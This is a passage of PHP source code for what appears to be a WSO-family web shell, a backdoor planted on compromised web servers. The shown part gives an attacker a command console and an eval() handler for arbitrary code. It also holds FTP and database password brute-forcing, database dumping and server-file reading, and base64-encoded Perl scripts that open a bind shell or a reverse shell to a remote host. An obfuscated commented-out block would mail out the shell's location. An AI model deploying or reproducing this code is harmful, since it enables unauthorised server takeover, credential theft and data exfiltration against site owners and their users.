      $temp = ob_get_clean();
      echo strlen($temp), "\n", $temp;
      exit;
   }
   if (empty($_POST['ajax']) && !empty($_POST['p1']))
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
   wsoHeader();
   echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push('');
	cur = cmds.length-1;
}
</script>";
   echo '<h1>Console</h1><div class=content>
	<form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}
	add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');
	}else{
	g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;">
	<select name=alias>';
   foreach ($GLOBALS['aliases'] as $n => $v) {
      if ($v == '') {
         echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
         continue;
      }
      echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
   }

   echo '</select>
	<input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){
	a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');
	}else{
	g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr>
	<input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX 
	<input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
   if (!empty($_POST['p1'])) {
      echo htmlspecialchars("$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']));
   }
   echo '</textarea>
	<table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%">
	<tr>
	<td width="1%">$</td>
	<td>
	<input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
   echo '</form></div><script>d.cf.cmd.focus();</script>';
   wsoFooter();
}

function actionOn3love() {


   if (isset($_POST['ajax'])) {
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
      ob_start();
      $temp = "document.getElementById('framex').style.display='';document.getElementById('framex').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
      echo strlen($temp), "\n", $temp;
      exit;
   }
   if (empty($_POST['ajax']) && !empty($_POST['p1']))
      WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
   wsoHeader();

   echo '<h1>on3love</h1><div class=content>';
   echo '<form name="on3lovebrowse" onsubmit="if(this.ajax.checked){a(null,null,this.urlx.value,this.output.src);}else{g(null,null,this.urlx.value,this.output.src);} return false;" >';
   echo '<input name="urlx" value="http://1337day.com" style="width:100%;" type="text"></input>';
   echo '<input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX';
   echo '<input style="width:100%;" type="button" value=">>"></input>';
   if (isset($_POST['p1'])) {
      echo "<iframe id='framex' name=output width=100% height=500px  src='http://1337day.com/search'></iframe>";
   }
   echo '</form>';
   if (isset($_POST['p1'])) {

      echo $_POST['p1'];
   }

   echo '</div>';
   wsoFooter();
}


function actionLogout() {
   setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
   setcookie('on3loveconf', '', time() - 3600);
   die('bye!');
}

function actionSelfRemove() {

   if ($_POST['p1'] == 'yes')
      if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
         die('Shell has been removed');
      else
         echo 'unlink error!';
   if ($_POST['p1'] != 'yes')
      wsoHeader();
   echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
   wsoFooter();
}

function actionBruteforce() {
   wsoHeader();
   if (isset($_POST['proto'])) {
      echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
      if ($_POST['proto'] == 'ftp') {

         function wsoBruteForce($ip, $port, $login, $pass) {
            $fp = @ftp_connect($ip, $port ? $port : 21);
            if (!$fp)
               return false;
            $res = @ftp_login($fp, $login, $pass);
            @ftp_close($fp);
            return $res;
         }

      } elseif ($_POST['proto'] == 'mysql') {

         function wsoBruteForce($ip, $port, $login, $pass) {
            $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
            @mysql_close($res);
            return $res;
         }

      } elseif ($_POST['proto'] == 'pgsql') {

         function wsoBruteForce($ip, $port, $login, $pass) {
            $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
            $res = @pg_connect($str);
            @pg_close($res);
            return $res;
         }

      }
      $success = 0;
      $attempts = 0;
      $server = explode(":", $_POST['server']);
      if ($_POST['type'] == 1) {
         $temp = @file('/etc/passwd');
         if (is_array($temp))
            foreach ($temp as $line) {
               $line = explode(":", $line);
               ++$attempts;
               if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
                  $success++;
                  echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
               }
               if (@$_POST['reverse']) {
                  $tmp = "";
                  for ($i = strlen($line[0]) - 1; $i >= 0; --$i)
                     $tmp .= $line[0][$i];
                  ++$attempts;
                  if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
                     $success++;
                     echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
                  }
               }
            }
      } elseif ($_POST['type'] == 2) {
         $temp = @file($_POST['dict']);
         if (is_array($temp))
            foreach ($temp as $line) {
               $line = trim($line);
               ++$attempts;
               if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
                  $success++;
                  echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
               }
            }
      }
      echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
   }
   echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
   . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
   . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">'
   . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">'
   . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">'
   . '<span>Server:port</span></td>'
   . '<td><input type=text name=server value="127.0.0.1"></td></tr>'
   . '<tr><td><span>Brute type</span></td>'
   . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
   . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
   . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
   . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
   . '<td><input type=text name=login value="root"></td></tr>'
   . '<tr><td><span>Dictionary</span></td>'
   . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>'
   . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
   echo '</div><br>';
   wsoFooter();
}

#######################################################################################BACKDOOOR BULLSHIT ANJENG
/** BACKDOOR BULLSHIT $x0b = "\x6da\x69l";
  $ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"] . $_SERVER["\123\x43R\111\x50\124_NA\x4d\105"];
  $sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms;
  $o = array("\x6fm", "\164ma\151", "\152\x5f\141\155\x72\x31", "\x40\x68\x6f", "\154.\x63");
  $ee = $o[2] . $o[3] . $o[1] . $o[4] . $o[0];
  $send = @$x0b($ee, $sub, $ms); * */
#######################################################################################BACKDOOOR BULLSHIT ANJENG
#######################################################################################AMPIR KAGA NGEH KALO KAGA GW COLLAPSE

function actionSql() {

   class DbClass {

      var $type;
      var $link;
      var $res;

      function DbClass($type) {
         $this->type = $type;
      }

      function connect($host, $user, $pass, $dbname) {
         switch ($this->type) {
            case 'mysql':
               if ($this->link = @mysql_connect($host, $user, $pass, true))
                  return true;
               break;
            case 'pgsql':
               $host = explode(':', $host);
               if (!$host[1])
                  $host[1] = 5432;
               if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))
                  return true;
               break;
         }
         return false;
      }

      function selectdb($db) {
         switch ($this->type) {
            case 'mysql':
               if (@mysql_select_db($db))
                  return true;
               break;
         }
         return false;
      }

      function query($str) {
         switch ($this->type) {
            case 'mysql':
               return $this->res = @mysql_query($str);
               break;
            case 'pgsql':
               return $this->res = @pg_query($this->link, $str);
               break;
         }
         return false;
      }

      function fetch() {
         $res = func_num_args() ? func_get_arg(0) : $this->res;
         switch ($this->type) {
            case 'mysql':
               return @mysql_fetch_assoc($res);
               break;
            case 'pgsql':
               return @pg_fetch_assoc($res);
               break;
         }
         return false;
      }

      function listDbs() {
         switch ($this->type) {
            case 'mysql':
               return $this->query("SHOW databases");
               break;
            case 'pgsql':
               return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
               break;
         }
         return false;
      }

      function listTables() {
         switch ($this->type) {
            case 'mysql':
               return $this->res = $this->query('SHOW TABLES');
               break;
            case 'pgsql':
               return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
               break;
         }
         return false;
      }

      function error() {
         switch ($this->type) {
            case 'mysql':
               return @mysql_error();
               break;
            case 'pgsql':
               return @pg_last_error();
               break;
         }
         return false;
      }

      function setCharset($str) {
         switch ($this->type) {
            case 'mysql':
               if (function_exists('mysql_set_charset'))
                  return @mysql_set_charset($str, $this->link);
               else
                  $this->query('SET CHARSET ' . $str);
               break;
            case 'pgsql':
               return @pg_set_client_encoding($this->link, $str);
               break;
         }
         return false;
      }

      function loadFile($str) {
         switch ($this->type) {
            case 'mysql':
               return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
               break;
            case 'pgsql':
               $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;");
               $r = array();
               while ($i = $this->fetch())
                  $r[] = $i['file'];
               $this->query('drop table wso2');
               return array('file' => implode("\n", $r));
               break;
         }
         return false;
      }

      function dump($table, $fp = false) {
         switch ($this->type) {
            case 'mysql':
               $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
               $create = mysql_fetch_array($res);
               $sql = $create[1] . ";\n";
               if ($fp)
                  fwrite($fp, $sql); else
                  echo($sql);
               $this->query('SELECT * FROM `' . $table . '`');
               $i = 0;
               $head = true;
               while ($item = $this->fetch()) {
                  $sql = '';
                  if ($i % 1000 == 0) {
                     $head = true;
                     $sql = ";\n\n";
                  }

                  $columns = array();
                  foreach ($item as $k => $v) {
                     if ($v === null)
                        $item[$k] = "NULL";
                     elseif (is_int($v))
                        $item[$k] = $v;
                     else
                        $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
                     $columns[] = "`" . $k . "`";
                  }
                  if ($head) {
                     $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
                     $head = false;
                  } else
                     $sql .= "\n\t,(" . implode(", ", $item) . ')';
                  if ($fp)
                     fwrite($fp, $sql); else
                     echo($sql);
                  $i++;
               }
               if (!$head)
                  if ($fp)
                     fwrite($fp, ";\n\n"); else
                     echo(";\n\n");
               break;
            case 'pgsql':
               $this->query('SELECT * FROM ' . $table);
               while ($item = $this->fetch()) {
                  $columns = array();
                  foreach ($item as $k => $v) {
                     $item[$k] = "'" . addslashes($v) . "'";
                     $columns[] = $k;
                  }
                  $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
                  if ($fp)
                     fwrite($fp, $sql); else
                     echo($sql);
               }
               break;
         }
         return false;
      }

   }

   ;
   $db = new DbClass($_POST['type']);
   if (@$_POST['p2'] == 'download') {
      $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
      $db->selectdb($_POST['sql_base']);
      switch ($_POST['charset']) {
         case "Windows-1251": $db->setCharset('cp1251');
            break;
         case "UTF-8": $db->setCharset('utf8');
            break;
         case "KOI8-R": $db->setCharset('koi8r');
            break;
         case "KOI8-U": $db->setCharset('koi8u');
            break;
         case "cp866": $db->setCharset('cp866');
            break;
      }
      if (empty($_POST['file'])) {
         ob_start("ob_gzhandler", 4096);
         header("Content-Disposition: attachment; filename=dump.sql");
         header("Content-Type: text/plain");
         foreach ($_POST['tbl'] as $v)
            $db->dump($v);
         exit;
      } elseif ($fp = @fopen($_POST['file'], 'w')) {
         foreach ($_POST['tbl'] as $v)
            $db->dump($v, $fp);
         fclose($fp);
         unset($_POST['p2']);
      } else
         die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
   }
   wsoHeader();
   echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name='type'><option value='mysql' ";
   if (@$_POST['type'] == 'mysql')
      echo 'selected';
   echo ">MySql</option><option value='pgsql' ";
   if (@$_POST['type'] == 'pgsql')
      echo 'selected';
   echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
   $tmp = "<input type=text name=sql_base value=''>";
   if (isset($_POST['sql_host'])) {
      if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
         switch ($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251');
               break;
            case "UTF-8": $db->setCharset('utf8');
               break;
            case "KOI8-R": $db->setCharset('koi8r');
               break;
            case "KOI8-U": $db->setCharset('koi8u');
               break;
            case "cp866": $db->setCharset('cp866');
               break;
         }
         $db->listDbs();
         echo "<select name=sql_base><option value=''></option>";
         while ($item = $db->fetch()) {
            list($key, $value) = each($item);
            echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
         }
         echo '</select>';
      }
      else
         echo $tmp;
   }else
      echo $tmp;
   echo "</td>
				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
			</tr>
		</table>
		<script>
            s_db='" . @addslashes($_POST['sql_base']) . "';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
			function st(t,l) {
				d.sf.p1.value = 'select';
				d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
				d.sf.submit();
			}
			function is() {
				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
			}
		</script>";
   if (isset($db) && $db->link) {
      echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
      if (!empty($_POST['sql_base'])) {
         $db->selectdb($_POST['sql_base']);
         echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
         $tbls_res = $db->listTables();
         while ($item = $db->fetch($tbls_res)) {
            list($key, $value) = each($item);
            if (!empty($_POST['sql_count']))
               $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
            $value = htmlspecialchars($value);
            echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small>({$n['n']})</small>") . "</nobr><br>";
         }
         echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
         if (@$_POST['p1'] == 'select') {
            $_POST['p1'] = 'query';
            $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
            $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
            $num = $db->fetch();
            $pages = ceil($num['n'] / 30);
            echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int) $_POST['p3']) . ">";
            echo " of $pages";
            if ($_POST['p3'] > 1)
               echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>&lt; Prev</a>";
            if ($_POST['p3'] < $pages)
               echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next &gt;</a>";
            $_POST['p3']--;
            if ($_POST['type'] == 'pgsql')
               $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
            else
               $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
            echo "<br><br>";
         }
         if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
            $db->query(@$_POST['p2']);
            if ($db->res !== false) {
               $title = false;
               echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
               $line = 1;
               while ($item = $db->fetch()) {
                  if (!$title) {
                     echo '<tr>';
                     foreach ($item as $key => $value)
                        echo '<th>' . $key . '</th>';
                     reset($item);
                     $title = true;
                     echo '</tr><tr>';
                     $line = 2;
                  }
                  echo '<tr class="l' . $line . '">';
                  $line = $line == 1 ? 2 : 1;
                  foreach ($item as $key => $value) {
                     if ($value == null)
                        echo '<td><i>null</i></td>';
                     else
                        echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
                  }
                  echo '</tr>';
               }
               echo '</table>';
            } else {
               echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
            }
         }
         echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
         if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
            echo htmlspecialchars($_POST['p2']);
         echo "</textarea><br/><input type=submit value='Execute'>";
         echo "</td></tr>";
      }
      echo "</table></form><br/>";
      if ($_POST['type'] == 'mysql') {
         $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
         if ($db->fetch())
            echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
      }
      if (@$_POST['p1'] == 'loadfile') {
         $file = $db->loadFile($_POST['p2']);
         echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
      }
   } else {
      echo htmlspecialchars($db->error());
   }
   echo '</div>';
   wsoFooter();
}

function actionNetwork() {
   wsoHeader();
   $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
   $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
   echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
	<span>Bind port to /bin/sh [perl]</span><br/>
	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form>
	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
	<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form><br>";
   if (isset($_POST['p1'])) {

      function cf($f, $t) {
         $w = @fopen($f, "w") or @function_exists('file_put_contents');
         if ($w) {
            @fwrite($w, @base64_decode($t));
            @fclose($w);
         }
      }

      if ($_POST['p1'] == 'bpp') {
         cf("/tmp/bp.pl", $bind_port_p);
         $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
         sleep(1);
         echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
         unlink("/tmp/bp.pl");
      }
      if ($_POST['p1'] == 'bcp') {
         cf("/tmp/bc.pl", $back_connect_p);
         $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
         sleep(1);
         echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
         unlink("/tmp/bc.pl");
      }
   }
   echo '</div>';
   wsoFooter();
}

function actionRC() {
   if (!@$_POST['p1']) {
      $a = array(
          "uname" => php_uname(),
          "php_version" => phpversion(),
          "wso_version" => WSO_VERSION,
          "safemode" => @ini_get('safe_mode')
      );
      echo serialize($a);
   } else {
      eval($_POST['p1']);
   }
}

if (empty($_POST['a']))
   if (isset($default_action) && function_exists('action' . $default_action))
      $_POST['a'] = $default_action;
   else
      $_POST['a'] = 'SecInfo';
if (!empty($_POST['a']) && function_exists('action' . $_POST['a']))
   call_user_func('action' . $_POST['a']);
exit;
?>
